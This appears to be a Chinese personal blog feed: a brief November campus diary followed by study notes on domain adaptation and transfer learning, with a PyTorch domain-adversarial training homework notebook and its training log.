    ​ 最牛逼的伟哥发的论文被拒了。想想伟哥一天到晚都在电脑前,连个 CCFC 都中不了,而自己搁这天天吃喝玩乐十分快乐,也别对自己的论文有啥追求了😅。

    寄了
    啥啥啥
    这也太坑了吧
    还得是 Electronic
    太可恶了

    11.18

    周末两天时间都在审查自己生成的数据集,2W 多张图片看得我眼睛都绿了。最后边听易中天边审,听了 8 集!

    jpg

    晚霞

    ​ 温馨提示:多出去散步对身心有益😃。

    ​ 东湖公园傍晚的日落。

    11.19

    jpg

    江湖一笑 浪滔滔 红尘尽忘了 俱往矣 何足言道
    主要是时间真的太快了
    去年今日
    还在逃难呢
    好家伙
    我还看到我了
    去年今日伟哥天津网吧包夜
    我睡天津西
    太可恶了
    没事明年这个时候希望已经在福建了

    ​ 去年今日已经润了,今年今日要开始体会在河北从未有过的气候了。

    ​ 这一年来,自己成长了什么呢?

    11.20

    @全体成员 最近天气寒冷,温度变化较大,流感病毒比较厉害,同学们一定做好保暖措施,同时做好防护。如果有同学发烧,及时去医院检查,对症下药,多注意休息,早日恢复健康。🌹🌹🌹

    ​ 要是得了甲流,普通的药物不起作用,需要在医生指导下吃药,一般可能会让吃奥司他韦。

    ​ 辅导员突然在群里说注意防护之类的用词,意识到流感在学校里已经有些普遍了😇。

    11.22

    周三例行组会,汇报的师兄依然水啊!

    11.23

    ​ 华北地区的流感引起了世卫组织的注意!

    ​ 宿舍的凡哥喜提高烧🥵,感觉自己离寄也不远了。

    11.24

    jpg

    环卫工人:6

    ​ 树叶开始大幅落下。

    11.25

    jpg

    保定迎来了初雪,鉴定为《就这》
    太小了
    跟下雨一样
    笑死
    就这
    有点棉絮的感觉
    啥也不是
    勉强能看
    伟哥于 2023 年 11 月 25 日见到了人生中第一次下雪
    特此留念

    ​ 以为北边会有比较大的雪呢,高高兴兴地跑去北边的公园玩,看了个寂寞。

    jpg

    落光光

    ​ 东湖公园的树叶已经落下,湖面甚至开始结冰。

    jpg

    热得一比 vs 冷得一比

    jpg jpg jpg jpg jpg jpg jpg jpg jpg

    ]]>
    @@ -4121,7 +4121,7 @@ /posts/ML-%E6%9D%8E%E5%AE%8F%E6%AF%85-Lecture%2011-Adaptation/ - Preparation

    【機器學習 2021】概述領域自適應 (Domain Adaptation)

    png

    Domain shift: 训练集和测试集的分布不同,解决方法:Domain adaptation

    迁移学习:ML Lecture 19: Transfer Learning - YouTube

    png

    Domain Shift 分为三种情况:

    • Training Data 和 Testing Data 分布不同,我们将 Training Data 所在域称为 Source Domain,Testing Data 所在域称为 Target Domain(本节课只考虑这个情形)。
    • Training Data 和 Testing Data 标签分布不同。
    • Training Data 和 Testing Data 标签不同。

    png

    Domain Adaptation

    如果我们对 target domain 有一定认识:Little but labeled(数量少但正确标注)

    • Idea: training a model by source data, then fine-tune the model by target data

      从 source data 里预训练,再在 target data 上 fine-tune

    • Challenge: only limited target data, so be careful about overfitting

      由于 target data 数量小,小心过拟合的问题

    png

    Domain Adaptation 的 Basic Idea:设计一个 Feature Extractor 提取 Source Domain 和 Target Domain 的特征,使提取出的特征具有相同分布。

    png

    将网络分成两个部分:Feature Extractor 和 Label Predictor。

    png

    利用类似 GAN 的思路,设计一个 Domain Classifier 对 Feature Extractor 提取出的特征作二分类,判断提取出的特征属于 Source Domain 还是 Target Domain,目标为 $\theta_d^* = \arg\min_{\theta_d} L_d$。

    Label Predictor 依旧做类别预测:$\theta_p^* = \arg\min_{\theta_p} L$。

    Feature Extractor 既要骗过 Domain Classifier,又要提取出有价值的特征:$\theta_f^* = \arg\min_{\theta_f} (L - L_d)$。
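    把这三个目标合在一起看(此处是补充的推导示意,非原笔记内容),整体就是一个极小极大问题,与 GAN 的对抗训练同构:$\min_{\theta_f,\ \theta_p}\ \max_{\theta_d}\ \big(L(\theta_f,\theta_p) - L_d(\theta_f,\theta_d)\big)$。对 $\theta_d$ 取最大等价于把 $L_d$ 压到最小(练好域分类器);对 $\theta_f$ 取最小则是在压低分类损失的同时抬高 $L_d$,也就是骗过域分类器。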

    png

    最早有关 Domain Adversarial Training 的研究:[1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org)

    png

    假设我们当前样本的类别有两类:对于有标签的训练集,我们可以明显地划分为两类;对于没有标签的测试集,我们希望它的分布和训练集的分布越接近越好,如右图所示。

    png

    在这个思路上进行拓展:对于刚才手写识别的例子,输入一张图片得到的是一个向量,其中含有属于每一个分类的概率。我们希望测试集的样本离分界线越远越好,也就是输出向量要更集中于某一类,而不能各个分类的概率都差不多。

    png

    对于 Knowledge of target domain:

    png

    关于 Domain Generalization 的研究:

    Training 域大,Testing 域小:Domain Generalization with Adversarial Feature Learning | IEEE Conference Publication | IEEE Xplore

    Training 域小,Testing 域大:[1409.7495] Unsupervised Domain Adaptation by Backpropagation (arxiv.org)

    ML Lecture 19-Transfer Learning

    png

    关于迁移学习 Transfer Learning,分为两种情况:

    • Similar domain, different tasks 相似域,不同任务
    • Different domains, same task 不同域,相同任务

    png

    迁移学习的应用:Speech Recognition、Image Recognition、Text Analysis

    png

    类比于研究生与漫画家:

    • 研究生 → 漫画家
    • 导师 → 责编
    • 跑实验 → 画分镜
    • 投稿期刊 → 投稿 jump

    png

    对于 Transfer Learning,根据 Source Data (not directly related to the task) 和 Target Data 的情况,共有如下策略:

    | Target Data \ Source Data | labelled | unlabeled |
    | --- | --- | --- |
    | labelled | Fine-tuning 微调;Multitask Learning 多任务学习 | Self-taught learning 自学习(icml07-selftaughtlearning.pdf (stanford.edu)) |
    | unlabeled | Domain-adversarial training 域对抗训练;Zero-shot learning 零次学习 | Self-taught Clustering 自学聚类算法(icml.dvi (machinelearning.org)) |

    png

    Model Fine-tuning

    • Task description

      • Target data: $(x^t, y^t)$, 数量少
      • Source data: $(x^s, y^s)$, 数量多
    • Example: (supervised) speaker adaptation

      示例:(监督)speaker 自适应

      • Target data: audio data and its transcriptions of specificuser

        目标数据:特定用户的音频数据及其转录

      • Source data: audio data and transcriptions from many speakers

        来源数据:来自许多 speaker 的音频数据和转录

    • Idea: training a model by source data, then fine-tune the model by target data

      Idea:根据源数据训练模型,然后根据目标数据微调模型

      • Challenge: only limited target data, so be careful about overfitting

        挑战:只有有限的目标数据,所以要小心过度拟合

    png

    Conservative Training:

    • 我们先通过 Source data 去 train 一个 model
    • 然后并不是直接把这个 model 当作 pre-trained model,用少量的 target data 去训练一个新的 model
    • 而是加入一些正则化项,保证新 model 和旧 model 在相同 input 下的 output 尽可能相近(正则项的一种写法见下方示意)。
    • 为什么要这样做呢?原因很简单:如果在 train 新 model 的过程中不加这个正则项(也叫限制项),那么把 source data 送进新 model 时会发现整个 model 彻底坏掉了,它已经不具备原先 model 在 source data 上的表现能力。这也是 ML 中经常出现的一个非常重要的问题:灾难性遗忘。
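    用 PyTorch 写一个正则项的最小示意(假设代码:new_model 由旧模型初始化,beta 为假设的超参数,仅示意思路,非课程代码):

    import torch

    def conservative_loss(new_model, old_model, x, y, task_loss_fn, beta=0.1):
        pred = new_model(x)
        with torch.no_grad():
            old_pred = old_model(x)            # 旧模型的输出,不参与梯度
        reg = ((pred - old_pred) ** 2).mean()  # 约束新旧模型在相同输入下输出相近
        return task_loss_fn(pred, y) + beta * reg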

    png

    Layer Transfer

    • 首先还是和 Conservative Training 一样,通过 Source data 去 train 一个 model
    • 然后将该 model 中某些层的 parameters 直接复制进去新的 model 中
    • 对于新 model 中那些没有复制到 parameters 的 layer,我们固定被复制过来的层的参数,用 target data 对这些层进行训练
    • 最后,如果 target data 的数据量比较充足,我们还可以对整个网络做 fine-tuning,进一步提升模型的性能。

    png

    • 对于 Speech 任务,通常 copy 最后几层

    • 对于 Image 任务,通常 copy 头几层

    png

    关于 Layer Transfer 的研究:

    png

    png

    Multitask Learning

    • 再来回顾下 fine-tuning 的过程,在做 fine-tuning 的时候,我们更加关注的是 model 在 target domain 上做的好不好,至于在 source domain 上做的到底怎么样,哪怕是将 source data 输入进这个新的 model 中,model 都坏掉了,也不要紧。只要这个新的 model 在 target domain 上做的很出色就够了。
    • 而 multitask learning 和 fine-tuning 的过程就不同了,multitask 是说,不仅要求我们的最终 model 在 target domain 上表现的相当出色,而且在 source domain 上同样也要表现的相当出色。

    png

    Multitask Learning 在多语言机器翻译上的研究:Multi-Task Learning for Multiple Language Translation (aclanthology.org)

    png

    png

    Progressive Neural Networks

    • 这篇论文里的方法还比较新:首先对于 task 1,我们 train 出一个 model
    • 然后把 task 1 中第 i 层的输出接入 task 2 的网络,和 task 2 自己第 i 层的输出一起,作为 task 2 第 i + 1 层的输入。
    • 依此类推,第 k 个网络会用到前 k - 1 个网络的信息。

    png

    对于 Source data 和 Target data 处于不同域:mismatch 时

    png

    Domain-adversarial training: 设计一个 Domain classifier,迫使 feature extractor 提取出相同分布的特征。

    png

    Domain-adversarial training

    • 第一部分绿色的 feature extractor 要做的是提取出 source data 和 target data 的 feature,让后面做 classification 时能借助这些 feature 得到很好的精度;同时还要尽可能让来自两个 domain 的 feature 分布混在一起,使 domain classifier 无法正确判断 feature 来自哪个 domain。
    • 第二部分蓝色的 label predictor 要做的是,尽可能提高 classification 的精度
    • 第三部分红色的 domain classifier 做的是,能够尽可能的将从 feature extractor 中提取出来的 feature 进行分开,将其各自归属到其所属的 domain 里。

    当然,关于这个网络的 train,讲起来很容易,实际操作起来,肯定会像 GAN 一样,涉及到很多的 trick。

    png

    png

    png

    Zero-shot Learning: Source data 和 Target data 是不同的 tasks.

    png

    png

    png

    在 NLP 领域中比较常见,可以用 word embedding

    png

    png

    png

    有关 Zero-shot Learning 的实验:[1312.5650v3] Zero-Shot Learning by Convex Combination of Semantic Embeddings (arxiv.org)

    png

    png

    png

    Self-taught learning 自学习

    • Learning to extract better representation from the source data (unsupervised approach) 学习从源数据中提取更好的表示(无监督方法)
    • Extracting better representation for target data 为目标数据提取更好的表示

    【機器學習 2022】惡搞自督導式學習模型 BERT 的三個故事

    png

    How versatile are self-supervised models?

    自监督模型的通用性如何?

    png

    • Cross-lingual 跨语言
    • Cross-discipline 跨学科
    • Pre-training with artificial data 使用人工数据进行预训练

    Cross-lingual

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    Cross-discipline

    png

    用 BERT 做 DNA 分类。

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    Pre-training with artificial data 使用人造数据进行预训练 BERT

    png

    png

    hw11_domain_adaptation

    场景,以及为什么要用 Domain Adversarial Training

    ​现在,我们有了已标记的源数据和未标记的目标数据,其中源数据可能与目标数据相关。现在,我们希望仅使用源数据训练模型,并在目标数据上对其进行测试。

    ​如果我们这样做,可能会出现什么问题?在学习了异常检测之后,我们现在知道,如果我们使用从未出现在源数据中的异常数据来测试模型,我们训练的模型很可能会导致性能不佳,因为它不熟悉异常数据。

    例如,我们有一个包含 Feature Extractor 和 Classifier 的模型:

    ​当使用源数据训练模型时,特征提取器 将提取有意义的特征,因为它熟悉它的分布。从下图中可以看出,蓝点(即源数据的分布)已经聚集到不同的集群中。因此,Classifier 可以根据这些集群预测标签。

    ​但是,在对目标数据进行测试时,Feature Extractor 将无法提取遵循源特征分布的有意义的特征,这会导致为源域学习的分类器无法应用于目标域。

    神经网络的域对抗训练 (DaNN)

    ​基于上述问题,DaNN 方法在源(训练时)和目标(测试时)域之间构建映射,以便为源域学习的分类器在与域之间学习的映射组合时也可以应用于目标域。

    在 DaNN 中,作者在训练框架里添加了一个域分类器:它是一个经判别式训练的深度分类器,通过特征提取器提取的特征来区分数据来自哪个领域。随着训练的进行,该方法一边强化能区分源域和目标域的域分类器,一边强化特征提取器,使其提取的特征对源域上的主要学习任务有判别力,而对域之间的差异不加区分。

    ​特征提取器往往能压过域分类器,因为域分类器的输入正是特征提取器生成的特征;而且域分类与标签分类这两个任务并不冲突。

    ​这种方法导致了域不变且位于相同特征分布上的特征的出现。

    数据介绍

    ​我们的任务包含源数据:真实照片和目标数据:手绘涂鸦。

    ​我们将使用照片和标签训练模型,并尝试预测手绘涂鸦的标签是什么。

    ​数据可以在这里下载。下面的代码用于数据下载和可视化。

    ​注意:源数据和目标数据都是平衡数据,您可以使用此信息。

    # Download dataset
    !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.0/real_or_drawing.zip" -O real_or_drawing.zip

    # Download from mirrored dataset link
    # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.1/real_or_drawing.zip" -O real_or_drawing.zip
    # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.2/real_or_drawing.zip" -O real_or_drawing.zip

    # Unzip the files
    !unzip real_or_drawing.zip
    Streaming output truncated to the last 5000 lines.
    inflating: real_or_drawing/train_data/0/106.bmp
    inflating: real_or_drawing/train_data/0/107.bmp
    inflating: real_or_drawing/train_data/0/108.bmp
    inflating: real_or_drawing/train_data/0/109.bmp
    inflating: real_or_drawing/train_data/0/11.bmp
    ...
    import matplotlib.pyplot as plt

    def no_axis_show(img, title='', cmap=None):
    # imshow, and set the interpolation mode to be "nearest"。
    fig = plt.imshow(img, interpolation='nearest', cmap=cmap)
    # do not show the axes in the images.
    fig.axes.get_xaxis().set_visible(False)
    fig.axes.get_yaxis().set_visible(False)
    plt.title(title)

    titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
    plt.figure(figsize=(18, 18))
    for i in range(10):
    plt.subplot(1, 10, i+1)
    fig = no_axis_show(plt.imread(f'real_or_drawing/train_data/{i}/{500*i}.bmp'), title=titles[i])

    png

    plt.figure(figsize=(18, 18))
    for i in range(10):
    plt.subplot(1, 10, i+1)
    fig = no_axis_show(plt.imread(f'real_or_drawing/test_data/0/' + str(i).rjust(5, '0') + '.bmp'))

    png

    特殊领域知识

    ​我们在涂鸦时,通常只画轮廓,因此我们可以对源数据进行边缘检测处理,使其与目标数据更加相似。

    Canny 边缘检测

    ​Canny Edge Detection 的实现如下。 此处不会详细描述该算法。如果您有兴趣,请参考 wiki 或这里

    ​我们只需要两个参数即可使用 CV2 实现 Canny Edge Detection:low_threshold 和 high_threshold。

    cv2.Canny(image, low_threshold, high_threshold)

    ​简单地说,当像素的梯度值超过 high_threshold 时,直接判定为边缘;介于 low_threshold 和 high_threshold 之间时,只有当它与已判定的强边缘相连时才保留(滞后阈值法);低于 low_threshold 则丢弃。

    ​让我们在源数据上实现它。

    import cv2
    import matplotlib.pyplot as plt
    titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
    plt.figure(figsize=(18, 18))

    original_img = plt.imread(f'real_or_drawing/train_data/0/0.bmp')
    plt.subplot(1, 5, 1)
    no_axis_show(original_img, title='original')

    gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
    plt.subplot(1, 5, 2)
    no_axis_show(gray_img, title='gray scale', cmap='gray')

    canny_50100 = cv2.Canny(gray_img, 50, 100)
    plt.subplot(1, 5, 3)
    no_axis_show(canny_50100, title='Canny(50, 100)', cmap='gray')

    canny_150200 = cv2.Canny(gray_img, 150, 200)
    plt.subplot(1, 5, 4)
    no_axis_show(canny_150200, title='Canny(150, 200)', cmap='gray')

    canny_250300 = cv2.Canny(gray_img, 250, 300)
    plt.subplot(1, 5, 5)
    no_axis_show(canny_250300, title='Canny(250, 300)', cmap='gray')

    png

    数据处理

    ​数据适用于 torchvision.ImageFolder。您可以使用 torchvision.ImageFolder 创建数据集。图像增广的详细信息请参考以下代码中的注释。

    import numpy as np
    import torch                                # 张量操作
    import torch.nn as nn                       # 神经网络层
    import torch.nn.functional as F
    from torch.autograd import Function         # 自动微分

    import torch.optim as optim                 # 优化器
    import torchvision.transforms as transforms
    from torchvision.datasets import ImageFolder
    from torch.utils.data import DataLoader

    # source_transform 使用 Canny 算法进行边缘检测,然后应用了一些数据增强操作,如翻转和旋转。
    source_transform = transforms.Compose([
        # Turn RGB to grayscale. (Because Canny does not support RGB images.)
        transforms.Grayscale(),  # 转换为灰度图
        # cv2 does not support PIL.Image, so we transform it to np.array,
        # and then adopt the cv2.Canny algorithm.
        transforms.Lambda(lambda x: cv2.Canny(np.array(x), 170, 300)),  # 应用 Canny 边缘检测
        # Transform np.array back to a PIL image.
        transforms.ToPILImage(),  # 转换为 PIL 图像对象
        # 50% Horizontal Flip. (For Augmentation)
        transforms.RandomHorizontalFlip(),  # 50% 概率水平翻转
        # Rotate +- 15 degrees. (For Augmentation), and fill with zero
        # if there's an empty pixel after rotation.
        transforms.RandomRotation(15, fill=(0,)),  # 旋转 ±15 度,空白像素填充为 0
        # Transform to tensor for model inputs.
        transforms.ToTensor(),  # 转换为 PyTorch 张量
    ])

    # target_transform 则不包含边缘检测,而是对图像大小进行了调整(从 28x28 调整到 32x32),以便与训练数据一致。
    target_transform = transforms.Compose([
        # Turn RGB to grayscale.
        transforms.Grayscale(),
        # Resize: size of source data is 32x32, thus we need to
        # enlarge the size of target data from 28x28 to 32x32.
        transforms.Resize((32, 32)),  # 调整大小到 32x32
        # 50% Horizontal Flip. (For Augmentation)
        transforms.RandomHorizontalFlip(),
        # Rotate +- 15 degrees. (For Augmentation), and fill with zero
        # if there's an empty pixel after rotation.
        transforms.RandomRotation(15, fill=(0,)),
        # Transform to tensor for model inputs.
        transforms.ToTensor(),
    ])

    # ImageFolder 类从指定路径加载图像文件夹中的数据,并将 source_transform 和 target_transform 应用于图像数据。
    source_dataset = ImageFolder('real_or_drawing/train_data', transform=source_transform)
    target_dataset = ImageFolder('real_or_drawing/test_data', transform=target_transform)

    # 这里的 DataLoader 为训练和测试集创建批量加载器,将数据分批次加载到模型中。
    # batch_size=32 表示每个批次包含 32 张图像,shuffle=True 用于随机打乱训练集的顺序,有助于减少过拟合。
    # test_dataloader 用于加载测试数据,shuffle=False 表示测试集的顺序不会被打乱。
    source_dataloader = DataLoader(source_dataset, batch_size=32, shuffle=True)
    target_dataloader = DataLoader(target_dataset, batch_size=32, shuffle=True)
    test_dataloader = DataLoader(target_dataset, batch_size=128, shuffle=False)

    模型

    ​Feature Extractor:经典 VGG 式架构

    ​标签预测器/域分类器:线性模型。

    class FeatureExtractor(nn.Module):

        def __init__(self):
            super(FeatureExtractor, self).__init__()

            # FeatureExtractor 是一个卷积神经网络,用于从输入图像中提取高维特征。该模块包含 5 个卷积层块,每个块包括:
            self.conv = nn.Sequential(
                nn.Conv2d(1, 64, 3, 1, 1),   # 一个卷积层(Conv2d)用于提取空间特征;
                nn.BatchNorm2d(64),          # 批归一化层(BatchNorm2d),用于稳定训练过程;
                nn.ReLU(),                   # ReLU 激活函数,使网络具有非线性;
                nn.MaxPool2d(2),             # 最大池化层(MaxPool2d),用于下采样和减少特征图的尺寸。

                nn.Conv2d(64, 128, 3, 1, 1),
                nn.BatchNorm2d(128),
                nn.ReLU(),
                nn.MaxPool2d(2),

                nn.Conv2d(128, 256, 3, 1, 1),
                nn.BatchNorm2d(256),
                nn.ReLU(),
                nn.MaxPool2d(2),

                nn.Conv2d(256, 256, 3, 1, 1),
                nn.BatchNorm2d(256),
                nn.ReLU(),
                nn.MaxPool2d(2),

                nn.Conv2d(256, 512, 3, 1, 1),
                nn.BatchNorm2d(512),
                nn.ReLU(),
                nn.MaxPool2d(2)
            )

        def forward(self, x):
            x = self.conv(x).squeeze()
            return x

    class LabelPredictor(nn.Module):

        def __init__(self):
            super(LabelPredictor, self).__init__()

            self.layer = nn.Sequential(
                nn.Linear(512, 512),  # 第一和第二层是 512 维输入和 512 维输出的全连接层,分别通过 ReLU 激活;
                nn.ReLU(),

                nn.Linear(512, 512),
                nn.ReLU(),

                nn.Linear(512, 10),   # 最后一层是一个全连接层,输出大小为 10,用于分类。
            )

        def forward(self, h):
            c = self.layer(h)
            return c

    class DomainClassifier(nn.Module):

        def __init__(self):
            super(DomainClassifier, self).__init__()

            self.layer = nn.Sequential(
                nn.Linear(512, 512),  # 每个隐藏层之后都有批归一化(BatchNorm1d)和 ReLU 激活。
                nn.BatchNorm1d(512),
                nn.ReLU(),

                nn.Linear(512, 512),
                nn.BatchNorm1d(512),
                nn.ReLU(),

                nn.Linear(512, 512),
                nn.BatchNorm1d(512),
                nn.ReLU(),

                nn.Linear(512, 512),
                nn.BatchNorm1d(512),
                nn.ReLU(),

                nn.Linear(512, 1),    # 最后一层是一个单神经元输出层(Linear(512, 1)),用于预测域标签。
            )

        def forward(self, h):
            y = self.layer(h)
            return y
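    补一个形状检查的小示意(假设输入为 1×32×32 的灰度图):32 经过 5 次 stride-2 的 MaxPool 后空间尺寸变为 1,squeeze 掉 1×1 的空间维后特征维度正好是 512,与 LabelPredictor 的输入对得上:

    import torch

    x = torch.randn(4, 1, 32, 32)   # 伪造一个 batch:4 张 32x32 灰度图
    feat = FeatureExtractor()(x)    # 空间尺寸 32 -> 16 -> 8 -> 4 -> 2 -> 1,通道 512
    print(feat.shape)               # torch.Size([4, 512])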

    预处理

    ​在这里,我们使用 Adam 作为我们的优化器。

    # 初始化模型并将其移动到 GPU
    feature_extractor = FeatureExtractor().cuda()
    label_predictor = LabelPredictor().cuda()
    domain_classifier = DomainClassifier().cuda()

    # 定义损失函数
    class_criterion = nn.CrossEntropyLoss() # 交叉熵损失函数,用于分类任务。它会在 LabelPredictor 输出的类别概率分布和真实标签之间计算损失。
    domain_criterion = nn.BCEWithLogitsLoss() # 二元交叉熵损失(带 Logits,即自动处理 sigmoid 函数),用于二分类任务。这里用于计算 DomainClassifier 的域分类损失(判断样本属于哪个域),即通过二值标签来判断样本来自哪个数据分布。

    # 每个优化器使用 Adam 优化算法(optim.Adam),适合处理深度学习任务中的大量参数和梯度不稳定的问题。
    optimizer_F = optim.Adam(feature_extractor.parameters())
    optimizer_C = optim.Adam(label_predictor.parameters())
    optimizer_D = optim.Adam(domain_classifier.parameters())

    开始训练

    DaNN 实施

    ​在原始论文中,使用了 Gradient Reversal Layer。 Feature Extractor、Label Predictor 和 Domain Classifier 都同时进行训练。在这段代码中,我们首先训练 Domain Classifier,然后训练我们的 Feature Extractor(与 GAN 中的 Generator 和 Discriminator 训练过程的概念相同)。
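    作为对照,Gradient Reversal Layer 的一个最小 PyTorch 实现示意如下(非本作业代码,仅帮助理解;lamb 对应上文控制对抗强度的系数):

    import torch
    from torch.autograd import Function

    class GradReverse(Function):
        # 前向传播是恒等映射;反向传播时把梯度乘以 -lamb,
        # 使 feature extractor 朝“让 domain classifier 变差”的方向更新
        @staticmethod
        def forward(ctx, x, lamb):
            ctx.lamb = lamb
            return x.view_as(x)

        @staticmethod
        def backward(ctx, grad_output):
            return grad_output.neg() * ctx.lamb, None

    def grad_reverse(x, lamb=0.1):
        return GradReverse.apply(x, lamb)

    # 用法示意:domain_logits = domain_classifier(grad_reverse(feature))
    # 之后各部分都朝各自 loss 最小化的方向更新,一次 backward 即可完成对抗。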

    提醒

    • 控制域对抗性损失的 Lambda 在原始论文中是自适应的。您可以参考原著。此处 lambda 设置为 0.1。
    • 我们没有用于目标数据的标签,您只能通过将结果上传到 kaggle 来评估您的模型:)
    def train_epoch(source_dataloader, target_dataloader, lamb):
        '''
        Args:
          source_dataloader: source data 的 dataloader
          target_dataloader: target data 的 dataloader
          lamb: control the balance of domain adaptation and classification. 控制域适配与分类之间的平衡
        '''

        # D loss: Domain Classifier 的 loss
        # F loss: Feature Extractor & Label Predictor 的 loss
        # running_D_loss 用于累计域分类器的损失;
        # running_F_loss 用于累计特征提取器和标签分类器的损失;
        running_D_loss, running_F_loss = 0.0, 0.0
        # total_hit 和 total_num 用于计算源域的分类准确率。
        total_hit, total_num = 0.0, 0.0

        for i, ((source_data, source_label), (target_data, _)) in enumerate(zip(source_dataloader, target_dataloader)):
            # 这个循环同时迭代源域和目标域的数据批次。每次迭代中,source_data 和 source_label 为源域的图像和标签,target_data 为目标域的图像。
            source_data = source_data.cuda()
            source_label = source_label.cuda()
            target_data = target_data.cuda()

            # Mix the source data and target data, or it'll mislead the running params
            # of batch_norm. (running mean/var of source and target data are different.)
            mixed_data = torch.cat([source_data, target_data], dim=0)
            domain_label = torch.zeros([source_data.shape[0] + target_data.shape[0], 1]).cuda()
            # set domain label of source data to be 1.
            domain_label[:source_data.shape[0]] = 1

            # Step 1 : train domain classifier
            # 第一步:训练域分类器
            # 提取合并数据的特征 feature,feature.detach() 防止梯度反向传播到 feature_extractor。
            feature = feature_extractor(mixed_data)
            # We don't need to train the feature extractor in step 1.
            # Thus we detach the feature neurons to avoid backpropagation.
            domain_logits = domain_classifier(feature.detach())
            # 使用域标签 domain_label 和预测的 domain_logits 计算域分类损失 loss。
            loss = domain_criterion(domain_logits, domain_label)
            running_D_loss += loss.item()
            loss.backward()
            optimizer_D.step()

            # Step 2 : train feature extractor and label classifier
            # 第二步:训练特征提取器和标签分类器
            # class_logits 是标签分类器的预测结果,用于源域的分类。
            class_logits = label_predictor(feature[:source_data.shape[0]])
            # domain_logits 用于域分类。
            domain_logits = domain_classifier(feature)
            # loss = cross entropy of classification - lamb * domain binary cross entropy.
            # The reason for using subtraction is similar to the generator loss against the discriminator in GAN.
            # 损失函数包括源域的分类损失 class_criterion(class_logits, source_label) 和域适配损失 domain_criterion(domain_logits, domain_label),两者相减以达到类似对抗训练的效果。
            loss = class_criterion(class_logits, source_label) - lamb * domain_criterion(domain_logits, domain_label)
            running_F_loss += loss.item()
            loss.backward()
            # 更新 feature_extractor 和 label_predictor 的参数。
            # 每次训练批次后清零梯度,并计算源域的分类准确率。
            optimizer_F.step()
            optimizer_C.step()

            optimizer_D.zero_grad()
            optimizer_F.zero_grad()
            optimizer_C.zero_grad()

            total_hit += torch.sum(torch.argmax(class_logits, dim=1) == source_label).item()
            total_num += source_data.shape[0]
            print(i, end='\r')

        return running_D_loss / (i + 1), running_F_loss / (i + 1), total_hit / total_num

    # train 200 epochs
    # 在 200 个 epoch 中循环,每次 epoch 后保存模型参数并输出训练的损失和准确率。
    for epoch in range(200):
        train_D_loss, train_F_loss, train_acc = train_epoch(source_dataloader, target_dataloader, lamb=0.1)

        torch.save(feature_extractor.state_dict(), f'extractor_model.bin')
        torch.save(label_predictor.state_dict(), f'predictor_model.bin')

        print('epoch {:>3d}: train D loss: {:6.4f}, train F loss: {:6.4f}, acc {:6.4f}'.format(epoch, train_D_loss, train_F_loss, train_acc))
    epoch   0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
    epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
    epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
    epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
    epoch 4: train D loss: 0.5540, train F loss: 1.3243, acc 0.5140
    epoch 5: train D loss: 0.5439, train F loss: 1.2459, acc 0.5480
    epoch 6: train D loss: 0.5538, train F loss: 1.2264, acc 0.5482
    epoch 7: train D loss: 0.5369, train F loss: 1.1544, acc 0.5800
    epoch 8: train D loss: 0.5194, train F loss: 1.1397, acc 0.5838
    epoch 9: train D loss: 0.5368, train F loss: 1.0921, acc 0.5950
    epoch 10: train D loss: 0.5298, train F loss: 1.0657, acc 0.6070
    epoch 11: train D loss: 0.5146, train F loss: 1.0287, acc 0.6186
    epoch 12: train D loss: 0.5331, train F loss: 0.9963, acc 0.6338
    epoch 13: train D loss: 0.5301, train F loss: 0.9842, acc 0.6412
    epoch 14: train D loss: 0.5383, train F loss: 0.9447, acc 0.6488
    epoch 15: train D loss: 0.5252, train F loss: 0.9263, acc 0.6560
    epoch 16: train D loss: 0.5268, train F loss: 0.8820, acc 0.6748
    epoch 17: train D loss: 0.5110, train F loss: 0.8503, acc 0.6848
    epoch 18: train D loss: 0.4955, train F loss: 0.8061, acc 0.7070
    epoch 19: train D loss: 0.5145, train F loss: 0.7806, acc 0.7096
    epoch 20: train D loss: 0.4760, train F loss: 0.7562, acc 0.7194
    epoch 21: train D loss: 0.4721, train F loss: 0.7087, acc 0.7350
    epoch 22: train D loss: 0.4876, train F loss: 0.6906, acc 0.7458
    epoch 23: train D loss: 0.4821, train F loss: 0.6563, acc 0.7580
    epoch 24: train D loss: 0.4547, train F loss: 0.6063, acc 0.7780
    epoch 25: train D loss: 0.4642, train F loss: 0.6035, acc 0.7788
    epoch 26: train D loss: 0.4758, train F loss: 0.5768, acc 0.7826
    epoch 27: train D loss: 0.4539, train F loss: 0.5465, acc 0.7956
    epoch 28: train D loss: 0.4447, train F loss: 0.4864, acc 0.8144
    epoch 29: train D loss: 0.4610, train F loss: 0.5191, acc 0.8064
    epoch 30: train D loss: 0.4341, train F loss: 0.4504, acc 0.8372
    epoch 31: train D loss: 0.4363, train F loss: 0.4291, acc 0.8380
    epoch 32: train D loss: 0.4493, train F loss: 0.4082, acc 0.8508
    epoch 33: train D loss: 0.4308, train F loss: 0.3958, acc 0.8506
    epoch 34: train D loss: 0.4318, train F loss: 0.3513, acc 0.8658
    epoch 35: train D loss: 0.4356, train F loss: 0.3378, acc 0.8708
    epoch 36: train D loss: 0.3975, train F loss: 0.3467, acc 0.8684
    epoch 37: train D loss: 0.4213, train F loss: 0.3099, acc 0.8794
    epoch 38: train D loss: 0.3939, train F loss: 0.2874, acc 0.8900
    epoch 39: train D loss: 0.4279, train F loss: 0.3113, acc 0.8826
    epoch 40: train D loss: 0.4045, train F loss: 0.2726, acc 0.8916
    epoch 41: train D loss: 0.4015, train F loss: 0.2682, acc 0.8974
    epoch 42: train D loss: 0.3976, train F loss: 0.2458, acc 0.9062
    epoch 43: train D loss: 0.4092, train F loss: 0.2502, acc 0.9026
    epoch 44: train D loss: 0.3983, train F loss: 0.2196, acc 0.9120
    epoch 45: train D loss: 0.3920, train F loss: 0.2242, acc 0.9158
    epoch 46: train D loss: 0.4072, train F loss: 0.2050, acc 0.9168
